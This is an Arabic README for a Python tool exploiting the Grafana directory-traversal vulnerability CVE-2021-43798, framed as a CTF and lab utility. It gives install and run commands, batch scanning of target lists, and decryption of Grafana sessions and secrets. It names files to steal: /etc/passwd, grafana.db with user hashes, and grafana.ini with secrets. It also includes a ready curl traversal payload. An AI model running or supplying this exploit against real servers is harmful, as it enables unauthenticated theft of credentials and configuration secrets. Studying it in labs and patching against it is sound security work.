
📂 Grafana LFI Exploit (CVE-2021-43798). استخراج تلقائي لبيانات الاعتماد والإعدادات. 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
نص برمجي للأتمتة بلغة Python 3 لاستغلال ثغرة تضمين الملفات المحلية (Local File Inclusion - LFI) في Grafana (الإصدارات من 8.0.0 إلى 8.3.0). يتيح هذا الاستغلال تنفيذ directory traversal لقراءة ملفات حساسة من نظام التشغيل دون مصادقة. ✨ الميزات
التوافق مع Python 3.10+: تم تصحيحه ليعمل مع الإصدارات الحديثة من Python (إصلاح collections.Mapping).
المسح بالدفعات: القدرة على معالجة أهداف متعددة من خلال ملف targets.txt.
فك تشفير البيانات: يتضمن وحدات للتعامل مع جلسات Grafana وبياناته المشفرة.
محسَّن للـ CTF: مخرجات نظيفة ومباشرة، مثالية للمختبرات مثل HackTheBox وTryHackMe.
🛠️ المتطلبات والتثبيت
بسبب اعتماد الأداة على مكتبات قديمة، يُنصح بتثبيت الحزم التالية: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
ملاحظة: إذا كنت تستخدم Python 3.10 أو أحدث، يتضمن النص البرمجي تصحيحًا تلقائيًا للتوافق مع collections.abc.
🚀 الاستخدام
إعداد الأهداف: أضف عناوين URL (مع المنفذ) إلى ملف targets.txt.
Bash
echo "http://10.129.234.47:3000" > targets.txt
تنفيذ الاستغلال:
Bash
python3 exploit.py
🎯 أهداف القراءة الشائعة (LFI)
بعد التشغيل، يمكنك محاولة قراءة ملفات حرجة مثل:
/etc/passwd (مستخدمو النظام)
/var/lib/grafana/grafana.db (قاعدة بيانات تحتوي على hashes المستخدمين)
/etc/grafana/grafana.ini (الإعدادات والأسرار)
💡 طريقة بديلة (يدوية)
إذا كنت تفضّل عدم استخدام النص البرمجي، يمكنك استغلال ثغرة LFI مباشرةً عبر curl: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ إخلاء مسؤولية
أُنشئ هذا المستودع لأغراض تعليمية فقط وللاستخدام في بيئات خاضعة للتحكم (CTFs ومختبرات). لا يتحمل المؤلف مسؤولية إساءة استخدام هذه الأداة. 🏷️ المواضيع (الوسوم)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal